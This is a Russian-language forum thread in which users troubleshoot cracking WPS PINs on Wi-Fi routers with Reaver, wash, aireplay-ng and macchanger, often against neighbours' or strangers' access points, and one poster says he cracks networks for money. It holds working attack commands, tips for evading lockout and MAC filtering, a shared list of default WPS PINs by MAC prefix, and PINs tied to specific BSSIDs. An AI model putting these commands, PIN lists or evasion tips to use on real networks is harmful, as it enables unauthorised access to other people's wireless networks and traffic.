Занятно то что произошла ошибка, при повторном подборе все получилось, однако ключик в hex формате почемуто выдало и ssid другой почемуто))причем еще раз попробовал с найденным пином reaver запустить и он выдал другой шестнадцатиричный ключ. П.С. главное результат положительный . И вот еще вопросец,если АР лочит после перебора буквально 7-8 пинов то какую паузу между перебором нужно ставить или лок по количеству неправильных происходит? Просветите новичка .
Stranger@
09.10.2012, 15:54
У меня часто так бывает, что выдаёт только WPS PIN. Тогда я пробую коннектиться именно по нему (wpa_cli wps_reg BSSID PIN)
Прошу прощения, эту команду открывать через терминал root
или через reaver? Что то пробовал и так и так в BTR3 у меня не соединялось. Спасибо.
Rockstar7
13.10.2012, 16:18
Подскажите в чем проблем: Reaver 1.4 выдает
[!] WPS transaction failed (code: 0x03), re-trying last pin
[!] WPS transaction failed (code: 0x02), re-trying last pin
ну и бесконечно выдает одно и тоже
[+] Trying pin 12345670
Установленна Bt 5R3 и TL WN7200ND
Добавлено: oткатился на Reaver 1.3 вроде зарабало!
Rockstar7
Удалось точку по хакать?
А то у меня схожая проблема, reaver 1.4 зацикливается на одном пине
Ривер 1.3 брутил 8 часов с нулевым результатом.
Прошу прощения, эту команду открывать через терминал root
или через reaver? Что то пробовал и так и так в BTR3 у меня не соединялось. Спасибо.
В рутовом терминале. Сначала нужно запустить wpa_supplicant, например:
wpa_supplicant -Dwext -iwlan0 -C/var/run/wpa_supplicant -B
Затем запустить wpa_cli, и в его командной строке запускать wps_reg и по желанию - любые другие команды. Также можно в рутовой консоли набрать wpa_cli wps_reg $BSSID $PIN — тогда оно отработает эту команду и вернётся в терминал. Если всё сделано правильно, но всё равно не соединяется — тогда уже не знаю, у меня такое тоже было
у меня вокруг куча точек, и все точки от Укртелекома, которые он по акции раздает за один рупь. Практически везде включен wps, но при запуске reaver, перебирает 10 pin-кодов и потом все глухо. Кто нибудь решил эту проблему?
Тут забрасывали идею создать базу pin-кодов, но на нее откликнулись только несколько человек, и на этом интузиазм закончился. Лично меня интересует какой pin может быть у C8:64:C7 ?
Rockstar7
22.10.2012, 11:15
Rockstar7
Удалось точку по хакать?
А то у меня схожая проблема, reaver 1.4 зацикливается на одном пине
Ривер 1.3 брутил 8 часов с нулевым результатом.
Нет так и не получилось. Специально взял dir 615 настроенный по дефолту на нем те же самые ошибки, полез в настройки и заметил что по умолчание выбраны две галочки , наталкивает на мысль что хоть и показывает наличие wps утилита wash работать он может только от нажатия хардвейной кнопочки с боку рутера. зы кто пины собирает этот стоковый от точки 1c7ee5.4622$$
Rockstar7
На скрине только одна галка видна.."Disable WPS-PIN Method"
Пин на котором прога зацикливается он совпадает с тем что указано в настройках роутера?
Из головы не выходит один вопрос, точнее 2, сам ответ найти не смог может, кто здесь подскажет или в какую сторону копать даст совет.
Итак:
1. "Раздолбил" благодаря неотключенному WPS некоторое количество точек доступа, к сожалению, большинство из них дали только пин-код. И все же от чего зависит: даст ли очередная БС пин и ключ или только пин, от версияи реализации ВПС или это всего навсего значит, что владелец данной БС, вообще, ключ не настраивал, а подключается исключительно по ВПС?
У какого какие мысли?
2. Подключаюсь к базе по пину (wpa_supplicant -Dwext -iwlan1 -C/var/run/wpa_supplicant -B
wpa_cli wps_reg - спасибо запостившему) в wpa_gui жму вкладку "edit" и там, о чудо, в прежде пустой строке "PSK" уже есть прописанная строка с ключом, которая, к сожалению, пока в виде "кружечков". Есть ли какая-либо возможность получить из нее ключ в читаемом виде?
Ну и раз пошла такая пьянка еще вопросик вдогонку. Подключаясь через wpa_gui к некоторым БС, не могу начать в них работу из-за того, что мой dhcp клиент не отсылает в сеть запросы на присвоение мне ip адреса (смотрю в wireshark), как его (dhcp- клиента) привести в чувство или где можно себе прописать ip? Раньше никогда такой проблемы не возникало ибо подключался через wicd, там все просто...
от дир615 23180253
выдал вместе с паролем
Diman779
06.11.2012, 01:24
от дир615 23180253
выдал вместе с паролем
скажи пожалуйста , где можно найти пин коды для этих роутеров ????
20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530
20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530
00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP
00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ
Diman779
06.11.2012, 02:18
Можно ... в текущей версии 1.1.6 где-то так -
00:14:D1 26848185,1234XXXX
00:18:E7 15537782
00:19:15 12345670
00:19:70,00:21:29 64637129,22310298
00:24:17 31011193
00:26:44 7820XXXX,78202962
00:38:72 1562XXXX,18836486
00:48:7A 15471628
00:0C:F1 30447028
00:1A:2B 15624697,8847XXXX
00:1D:19,00:1D:7E 66026402
00:1D:73 88420707
00:4F:62 21207136
7C:4F:B5 75332662,72688656
A0:21:87 92442559
A0:21:B7 63825XXX,0634XXXX,01318104,6557XXXX
5C:33:8E 82848439,11765592
84:A8:E4 7996XX00
30:46:9A 9754XXXX,95221XXX,3444XXXX,344449XX,1504XXXX,19482 417
30:39:F2 1670XXXX,16538061,4329XXXX
50:67:F0 20064525
F4:EC:38 26599625,146076XX,1452XXXX,18674095
F4:3E:61 58:6D:8F 47158382,69382161
94:44:52 93645348
08:86:3B 21250491
40:4A:03 11866428
64:68:0C 7996XXXX
88:25:2C 7654XXXX,03526859
04:C0:6F 0751XXXX
20:4E:7F 45197079
20:2B:C1 1957XXXX
F8:D1:11 4867XXXX
F4:C7:14,C4:3D:C7 5141XXXX
B0:48:7A 0055XXXX,54335677,1111XXXX
1C:7E:E5 6041XXXX,22609298,60418579
38:60:77,CC:96:77,C0:C1:C0 78985933,7898XXXX
C0:AC:54,C0:3F:0E 8345XXXX,2585XXXX,2503XXXX
34:08:04 36022656,93395274
74:44:01 3555XXXX,00446747
BC:76:70 6326xxxx
00:1D:CE 85560130
58:98:35 53890894
DC:0B:1A 1653XXXX
38:72:C0 12345678
72:C0:6F 3863XXXX
6A:C7:14 3205XXXX
CO:3F:0E 8321XXXX
72:A8:E4 3357XXXX
62:C0:6F 3663XXXX
00:0B:3B 3814XXXX
00:24:01 97744757
E0:CB:4E 62987523
00:26:CE 1148XXXX,11446958,7026XXXX,7047XXXX,9566XXXX
База постоянно обновляется
а есть для этих мас ???
20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530
20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530
00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP
00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ
user_bad
12.11.2012, 23:22
zyxel
CC:5D:4E:4E:AE:AB
51565220
Всем привет, прочитал весь форум по этой теме и многое чего почерпнул для себя, но есть вопрос: Прошу вашей помощи взломать точку WPA. В Reaver (BT5) стопорится на этом:
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
WPS включен, т.е. точка прсутствует при команде Wash -i mon0 -C -s. Вначале запустил aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one
и через некоторое время выдало, что соединения нет и показало список возможных причин и на первом месте было указано,что включен фильтр по МАС адресу, остальные-не стоили внимания.Тогда подменил МАС на клиентский и запустил airodump-ng mon0 -c 1, a в другом терминале- aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one и мне показало, что соединение есть, т.е.
Sending Authentication Request (Open System) [ACK]
Authentication Successfull
Sending association Request [ACK]
Association succesfull(AID:1), потом в первом терминале запустил reaver и ступор тот-же. Что посоветуете. Использую Rtl8187L, сигнал хороший.
При работе в reaver с дефолтным МАС я вижу, что через некоторое время роутер меня отключает, а при подменённым МАС связь держится постоянно, как показывает aireplay. Заранее благодарю.
zyxel
CC:5D:4E:4E:AE:AB
51565220
hex=4EAEAB
dec=5156523
Делай вывод и так большинство роутеров
Спасибо, но я не знаю что с этим делать, научите п.ж. Буду благодарен.
kachinski
16.11.2012, 16:04
Всем привет, прочитал весь форум по этой теме и многое чего почерпнул для себя, но есть вопрос: Прошу вашей помощи взломать точку WPA. В Reaver (BT5) стопорится на этом:
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
WPS включен, т.е. точка прсутствует при команде Wash -i mon0 -C -s. Вначале запустил aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one
и через некоторое время выдало, что соединения нет и показало список возможных причин и на первом месте было указано,что включен фильтр по МАС адресу, остальные-не стоили внимания.Тогда подменил МАС на клиентский и запустил airodump-ng mon0 -c 1, a в другом терминале- aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one и мне показало, что соединение есть, т.е.
Sending Authentication Request (Open System) [ACK]
Authentication Successfull
Sending association Request [ACK]
Association succesfull(AID:1), потом в первом терминале запустил reaver и ступор тот-же. Что посоветуете. Использую Rtl8187L, сигнал хороший.
При работе в reaver с дефолтным МАС я вижу, что через некоторое время роутер меня отключает, а при подменённым МАС связь держится постоянно, как показывает aireplay. Заранее благодарю.
Кстати с подмененным MAC как я заметил нужно входить только когда на точке нету этого самаого клиента, а то что показывает якобы висит поддельный MAC возможно то вовсе и не ваш, а реального клиента.
У меня еще хуже ситуация, долбил точку всю ночь, дошел до 99% с копейками, а с утра ее отключили. Airodump-ng тоже не показывает ее наличия, хорошо что reaver сохраняет прогресс.
Кстати с подмененным MAC как я заметил нужно входить только когда на точке нету этого самаого клиента, а то что показывает якобы висит поддельный MAC возможно то вовсе и не ваш, а реального клиента.
У меня еще хуже ситуация, долбил точку всю ночь, дошел до 99% с копейками, а с утра ее отключили. Airodump-ng тоже не показывает ее наличия, хорошо что reaver сохраняет прогресс.
Бывает , что точка доступа зависает от слишком частого запроса PIN . Пока не перезагрузят, АР не оклемается.
Можно попробовать увеличить задержку между попытками: reaver -i mon0 -b 00:01:02:03:04:05 -d 5 -S -v (можно выставит задержку от 5 до 15 сек.).
WPS PIN для таких MAC точек доступа:
54:04:A6:5D:50... 238373##
F81:11:32:1F... 961446##
B0:48:7A:F5:7B... 090061##
Привет всем!
Может поможете чем...
Есть точка доступа,сигнал от -65 до ~-50db, мак 80:1F:02:06:x:x видимо точка Edimax.
Мой девайс TL-WN7200ND. Пользуюсь Wifislax 4.3, но также пробовал BT5R2,3. Начал ривером подбирать пин (reaver -i mon0 -b ... -c 9):
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] 0.05% complete @ 2012-11-09 22:45:38 (2 seconds/pin)
Через некоторое время стали появляться ошибки, причем по логу видно что где-то через час и до утра:
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:43:35 (2 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:53:48 (3 seconds/pin)
...
[+] 11.87% complete @ 2012-11-10 09:57:27 (30 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
И тепер уже вторую неделю вот так (reaver -i mon0 -b ... -c 9 -vv):
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 9
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
Wash все это время показывает wps no на этой точке (TTk). Также пробовал другие wifi девайсы, добавлял команды essid, уменьшал время -d...
С другими точками подбор идет...
Из за чего может быть эта ошибка-Receive timeout occurred??
Заранее Спасибо!
...
Из за чего может быть эта ошибка-Receive timeout occurred??
Заранее Спасибо!
Думается варианта тут всего два:
1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.
2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
Думается варианта тут всего два:
1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.
2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
Сигнал до точки остался такой-же, даже в некоторых местах доходит до -45db.
По мак блокировку думаю маловероятно, после этого с других wifi карт пробовал, тоже самое получалось... На точке есть клиент, я пробовал подставлять в ривер мак клиента через команду -m...
Делал так:
ifconfig wlan0 down
macchanger -m (мак клиента) wlan0
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b (мак точка) -c 9 -m (мак клиента) -vv
handshake ловится практически сразу, но брут не помогает...
тема для брута http://forum.antichat.ru/thread274700.html
Делал так...
Нужно сменить МАС-адрес на интерфейсе. Делаем так:
ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up
Это будет совсем другое дело. Macchanger берём здесь если нету.
Нужно сменить МАС-адрес на интерфейсе. Делаем так:
ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up
Это будет совсем другое дело. Macchanger берём здесь если нету.
Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?
Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?
Нет.
Нет.
В общем попробовал с маком клиента, та же беда и когда клиент есть, и когда нету, сыпятся ошибки - [!] WARNING: Receive timeout occurred... Сигнал до точки ~ -59db. Клиента ~ -56db.
Может точка заблокировала WPS до перезагрузки?
Ведь как только начал подбирать, дошло до 11% за час...
Может есть какие-нибудь еще идеи?
Может есть какие-нибудь еще идеи?
На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.
На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.
Изначально начался подбор на родном маке TL-WN7200ND, но дошел до 11% и все никак, тепер WARNING: Receive timeout occurred лезет и всё, хоть сначала подбирай или с последнего пина всеравно ошибки..
Мак подставлял клиента, который ассоциировался на этой точке, но также пробовал запускать ривер с 2-x других wifi карт соответственно с разными маками, та же беда лезет, хотя на этих картах другие точки также ломались как и на TL-WN7200ND...
Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
с другими- [+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
и так 10 раз и ступор.
Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.
user_bad
24.11.2012, 23:10
Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
с другими- [+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
и так 10 раз и ступор.
Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.
второй случай имею на роутере NETGEAR и ничего не получается, как будто М5 вообще не бывает, переставлял цифирку подбор идет дальше но результата нет...
Отпишусь по своей проблеме - WARNING: Receive timeout occurred
Отключили в доме свет не надолго, подбор пошел опять, видимо точка блокировалась, а после перезагрузки опять давала подобрать.
PIN
80:1F:02:06:x:x - 686018xx может кому пригодится...
F1! F1! F1!
BackTrack 5 R3 BlackHat
root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 52:26:ED:8F:4D:E2
[+] Associated with 52:26:ED:8F:4D:E2 (ESSID: HDS)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
root@bt:~# wash -i mon0 -C -s
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
14:A9:E3:03:24:22 1 -84 1.0 No dmitriyconshin
14:A9:E3:02:4B:3A 1 -81 1.0 No Domolink_451608_R_msk
00:26:5A:319:50 1 -86 1.0 No dlink
C8:6C:87:41:25:1F 1 -76 1.0 No O_O
50:67:F0:16:FE:3C 1 -87 1.0 No Andrey
14:A9:E3:01:50:0E 1 -87 1.0 No DOMOLINK_FREEPORT_01500E
B0:B2C:3C:7C:30 1 -86 1.0 No Domolink_532202_R_msk
14:A9:E3:02:18:C6 3 -80 1.0 No DOMOLINK_FREEPORT_0218C6
34:08:04:14:7C:BE 6 -86 1.0 No dlink
20:CF:30:CE:10:59 11 -86 1.0 No mksbag
пробовал включать aireplay-ng но как он должен работать я не в курсе. не помогло. я вообще в линуксе 0. пока иду на ощупь, с закрытыми глазами. помогите плз. может советом, может ссылочкой на мануальчик. сейчас думаю попробовать wifislax 4.2 final/ может он поможет. только какие там команды прописывать....
та сетка которую я пытаюсь нагнуть имеет самый сильный сигнал. в wash она присутствует. просто в поле копирования не попала.
кстати. я пробовал reaverom все сетки корячить. и у всех одно и тоже. ломанул только одну. с совершенно убогим сигналом. минут за 20.
F1! F1! F1!
root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv.
Рекомендую прописать команду следующим образом:
reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv
Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.
Опция -a, позволяет оптимизировать работу Reaver.
Про доп опции к Reaver почитайте тут.
Уверены, что на точке "HDS" включен WPS ?
В приведенном вами списке wash её нет.
Рекомендую прописать команду следующим образом:
reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv
Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.
Опция -a, позволяет оптимизировать работу Reaver.
Про доп опции к Reaver почитайте тут.
Уверены, что на точке "HDS" включен WPS ?<br/>
В приведенном вами списке wash её нет.
вчера пробовал прописывать -vv --dh-small результат тот же.
в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.
вчера пробовал прописывать -vv --dh-small результат тот же.
в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.
Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.
Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.
хороший сигнал по всей квартире. предполагаю что это ктото из соседей снизу либо сверху. у меня 1 с очень хорошим сигналом 3-4 с нормальным. и ещё 5-7 со слабым. вот одну со слабым я ломанул а с остальными такая вот засада.
Взломал давно dir-615 c помощью dwa-510 + самопальная антенна, заняло около 10 суток, дак сейчас пароль хозяева сменили, а я пин забыл , точнее последние 4 цифры. Сейчас приспособил роутер с openwrt для этого дела. А вообще, плохи дела становятся с уязвимостью, почти все современные роутеры идут с отключенным wps. У меня из 15 сетей только 2 определяются как уязвимые.
А у меня точки вырубаются! По началу ключики перебираются с нормальной скоростью, а после полусуток резко вырубаются с эфира! Пока на двух заметил, и без разницы после или до 90%.Третью взломал с редким названием KINEETIC, она сразу "отдалась" т.к. пин ее - все нули! Ну я от радости полез в админку роутера, оно естественно под паролем.После нескольких попыток точка исчезла с эфира! Сканил под wifislax. Удалось еще без осложнений вскрыть nrendnet.
Пассы в 14 символов наверно не одним словарем радужным ни когда не подобрать.
denis839
04.12.2012, 11:34
Добрый день.
Сталкнулся с такой проблемкой:
reaver перебирает ПИН, потом (процентов через 5 ) пишет что нет ассоциации с точкой. При проверке выясняется, что WPS отключается. Сигнал отличный. Когда выключают свет или выполняют перезагрузку точки WPS опять активен на следующие примерно 5% перебора.
Пробовал менять MAC адрес адаптера на MAC адрес клиента - не помогло.
Вопрос в следующем: как избежать отказа асоциации и отключения WPS и как заставить перезагрузиться точку после отключения WPS для дальнейшего его включения.
P.S. накипело, нескем поделиться и посоветоваться: есть точки на которых включен WPS но при запуске reaver сканирует каналы, но ничего не происходит. С чем это связано?
Заранее благодарен.
Интересная функция позволяет приостановить перебор на определенное время после определенного количества попыток и затем его продолжить, не создавая лишнего “подозрения” у АР. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -r 8:20
1.Уровень сигнала 2.Reaver это все таки brut force и у кого то PIN начинался с 1111 а у кого то 9999 алгоритм работы reaver, сперва пины по default а затем по порядку. –S все таки полезная функция. 3.Защита на AP. Перезапуск с –vv а не просто -v дает более обширную информация что происходит с АР. У многих возникали вопросы по поводу reaver, вот не большой FAQ по материалам сети с небольшими комментами от меня. Думаю, он будет полезен. Почему возникают ошибки "timeout" и "out of order"? - Обычно это происходит из-за низкого уровня сигнала и плохой связи сточкой доступа. Кроме того, точка доступа может на время заблокировать использование WPS. Почему при плохом сигнале Reaver работает плохо, хотя тот же взлом WEP проходит нормально? - Взлом WEP происходит путем повторной пересылки перехваченных пакетов, чтобы получить векторы инициализации (IV), необходимых для успешного взлома. В этом случае неважно, потерялся какой-либо пакет, либо как-то был поврежден по пути. А вот для атаки на WPS необходимо строгое следование протоколу передачи пакетов между точкой доступа и Reaver для проверки каждого PIN-кода. Это делает атаки на WPS гораздо более зависимыми от уровня сигнала. Важно помнить, что если твой беспроводной адаптер видит точку доступа, то это ещё не значит, что и точка доступа видит тебя. Почему я постоянно получаю ошибки "rate limiting detected"? - Точка доступа заблокировала WPS. Обычно блокировка длится около пяти минут, но в некоторых случаях возможна полная “падение” АР - и только reset способен вернуть точку к “жизни”. Дополнительные опции, Reaver, которые могут повысить эффективность перебора ключа WPS. Можно задать номер канала -с и -е SSID точки доступа: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx (-S) '--dh-small' Полезная опция, которая задает небольшое значение PIN, тем самым облегчая работу reaver: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --dh-small (-t) --timeout Таймаут ожидания ответа по умолчанию равен пяти секундам. При необходимости его можно изменить: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -t 2 (-d) --delay Задержка между попытками по умолчанию равна одной секунде. Она также может быть настроена: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -d 5 (-l) --lock-delay Некоторые точки доступа могут блокировать WPS на определенное время. Reaver делает паузу в переборе на 315 секунд по умолчанию, длительность этой паузы можно менять: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --lock-delay=320 (-n) --nack Некоторые реализации протокола WPS разрывают соединение при неправильном PIN-коде, хотя по спецификации должны возвращать особое сообщение. Reaver автоматически распознает такую ситуацию, для этого существует опция: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --nаск' (-E) --eap-terminate. Опция предназначена для работы с теми АР, которые требуют завершения WPS-сессии с помощью сообщения ЕАР FAIL: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --eap-terminate (-L), --ignore-locks Игнорирование блокировки WPS-сессии. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --ignore-locks (-x) --fail-wait. Возникновение ошибок в WPS-сессии может означать, что АР ограничивает число попыток ввода PIN-кода, либо просто перегружена запросами. В этом случае Reaver приостанавливает свою деятельность после 10 попыток, на установленную временную паузу. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --fail-wait=360 (-T), --m57-timeout Установка интервала времени для M5/M7 - иногда помогает. По умолчанию 0.1 возможно увеличение до 1 сек. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -T .5 (-A), --no-associate. Отмена авторизации на АР, немного ускоряет процесс перебора PIN. reaver -i mon0 -А -b 00:00:00:00:00:00 -с 11 -е xxxxxx Авторизация должна быть запущенна отдельно. aireplay-ng mon0 -1 120 -a 00:00:00:00:00:00 -е xxxxxx (-p), --pin Если PIN уже подобран - иногда помогает увидеть WPA в “нормальном” виде (не НЕХ). Или возможен перебор сразу с установленного интервала, если вы уверены что ваш PIN начинается, скажем, с 3000. А также для теста. (Значение 4 или 8 цифр). reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --pin 3000 (-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15 -r, --recurring-delay Интересная функция позволяет приостановить перебор на определенное время после определенного количества попыток и затем его продолжить, не создавая лишнего “подозрения” у АР. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -r 8:20
(-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15- почему объяснять не нужно, думаю, не все это знают, например я. Объясните п ж. Спасибо.
Dovbnyak
10.12.2012, 02:19
Привет всем Видел много тем что много кто не мог установить WPScrsck gui решил помочь ) для начала качаем саму сборку ) http://sourceforge.net/projects/wpscrackgui/files/Ubuntu/ если у вас сборка Gnome сам ею пользуюсь то откроем консоль и введем воттакое dpkg -i копируем имя файла которий скачали и вставляем в моем слусае ето wpscrackgui_1.1.8-1_ubuntu.deb будет примерно так dpkg -i wpscrackgui_1.1.8-1_ubuntu.deb жмем ентер и ждем окончания потом пишем apt -get -f install спросит y/n берем y и ждем настройки и все готово можно пользоваться програмой ) она находится в подменю Internet )
1. dpkg -i wpscrackgui_1.1.8-1_ubuntu.deb
2. apt -get -f install
И радуемся что унас все получилось )
Dovbnyak
10.12.2012, 02:26
И еще сам довольно часто ломаю в барселоне AP так сказать на етом подрабативаю иногда приходится довольно часто наблюдать перебор одного и тогоже пароля типа 12345670 и ступор хотя по логу видно что все ок нак шлет итд.... подставлял разние функц... ничего не помагает откатил на 1.3 вроде все пошло но после 10или дааже больше пинов идет warning receive timeout occurred . Но WPS не блочит я так понял что точка делает паузу пробовал делать таймаут на 10-30 сек после 4 пинов после 6 ничего не омогло продержалось немного и потом опять лепит warning receive timeout occurred приходится все запускать по новой и + не удобно имя AP ORANGE знаю что в етих роутерах уже стояла защита от брута даже раньше всех но старие коробочки иногда здаются после бомбардировок MDK3 можно ли както обойти ету редиску ?
Dovbnyak
10.12.2012, 02:30
(-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15- почему объяснять не нужно, думаю, не все это знают, например я. Объясните п ж. Спасибо.
Что тут не понятно -w значит что reaver будет посилать мимики ввода pin как у Windows7 тем самим скроет подозрения брута ! Ну а g 15 если мне не врет память то ето время после которого будет произведена проба следуищего пароля чтоб не лепило 3 парося в сек ставим 15 сек и оно будет вводить пароль каждие 15 сек Или наоборот ето команда -d задает ето время влюбом случае они похожи между собой )
Всем привет,уважаемые форумчане. Не однократно читал, про откат reaver на версию 1.3 и это помогает. Я использую BT5R3 gnome загрузочный. Там можно откатить? Если да-то как? Заранее спасибо.
arkadiy0
10.12.2012, 20:48
Прошу помощи студии) Подобрал пин к точке а место пароля WPA2 вылезла вот такая хреновина http://s55.radikal.ru/i148/1212/0f/d738942e6fcd.png
